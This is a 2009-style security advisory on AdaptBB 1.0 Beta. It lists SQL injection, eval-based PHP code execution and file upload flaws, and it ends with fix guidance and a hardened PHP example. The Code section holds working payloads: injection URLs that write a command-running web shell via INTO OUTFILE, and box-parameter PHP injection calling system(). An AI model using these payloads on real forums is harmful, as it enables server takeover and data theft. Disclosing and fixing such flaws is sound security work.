******* Salvatore "drosophila" Fresta *******
[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
[B] Multiple Dynamic Code Execution
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple Blind SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary SQL
queries.
- [B] Multiple Dynamic Code Execution
[-] Risk: high
[-] Files affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary PHP
code. The value of the box parameter is copied into
the template data and the rendered template is then
passed to eval(), so PHP tags in that value are run:
...
if ($_GET['box']) {
    $folder = $_GET['box'];
}
...
$ddata[] = ucwords($folder);
...
eval (" ?> ".str_replace($cdata, $ddata,
stripslashes(template($view."_header")))." <?php ");
...
*************************************************
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
To execute commands:
http://site/path/rce.php?cmd=uname -a
- [B] Multiple Dynamic Code Execution
http://www.site.com/path/index.php?do=profile&user=blabla&box=<?php echo "<pre>"; system('ls'); echo "</pre>"?>
http://www.site.com/path/index.php?do=messages&user=blabla&box=<?php echo "<pre>"; system('ls'); echo "</pre>"?>
*************************************************
[+] Fix
To fix them you must check the input properly:
validate or allow-list every GET, POST and cookie
value before it is used, pass values to SQL through
prepared statements instead of string concatenation,
and never feed user-controlled data to eval(). Do not
rely on magic_quotes_gpc for protection. It is also
not recommended to store your real username and
password in the cookies.
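As an added example (not AdaptBB's own code, and not part of the original advisory), the box and id handling from the snippet above rewritten without eval() and without string-built SQL. The folder names, the posts table and its columns, the {FOLDER} placeholder and the function names are assumptions for illustration.

```php
<?php
// Added example, not AdaptBB code: hardened handling for the two inputs
// abused in the advisory. Folder names, table and columns are assumed.

// Fixed set of folder names the "box" parameter may select (assumed names).
const ALLOWED_BOXES = ['inbox', 'outbox', 'sent'];

// Original, vulnerable flow for reference (do not use): the raw $_GET['box']
// was passed through ucwords() into the template data, and the rendered
// template text was then handed to eval() wrapped in PHP open/close tags.

// Allow-list the box name. Strict comparison against a fixed set means
// "-1' UNION ..." and an injected PHP open tag are rejected before they
// reach any SQL or template, regardless of magic_quotes_gpc.
function select_box(array $get): string
{
    $folder = $get['box'] ?? 'inbox';
    if (!is_string($folder) || !in_array($folder, ALLOWED_BOXES, true)) {
        http_response_code(400);
        exit('invalid box');
    }
    return $folder;
}

// Build the header by plain substitution. The template text is never passed
// to eval(), and the value is HTML-escaped so it cannot break the page.
function render_header(string $template, string $folder): string
{
    $cdata = ['{FOLDER}'];                                        // assumed placeholder
    $ddata = [htmlspecialchars(ucwords($folder), ENT_QUOTES, 'UTF-8')];
    return str_replace($cdata, $ddata, $template);
}

// Numeric ids are validated and bound as integers. With a prepared statement,
// id=-1' UNION ALL SELECT ... INTO OUTFILE '...' is just a lookup that fails.
function load_post(mysqli $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, subject, body FROM posts WHERE id = ?'); // assumed schema
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage sketch (connection details assumed):
//   $db     = new mysqli('localhost', 'adaptbb', 'secret', 'adaptbb');
//   $folder = select_box($_GET);
//   echo render_header(template($view . '_header'), $folder);
//   $post   = load_post($db, $_GET);
```

Independently of the code, the INTO OUTFILE step in the [A] payloads only works when the forum's database account holds the MySQL FILE privilege and secure_file_priv does not confine file writes to a directory outside the web root. Running the application's database user without FILE, and keeping the web root unwritable by the MySQL server process, removes the path to rce.php even if another injection point turns up.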
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351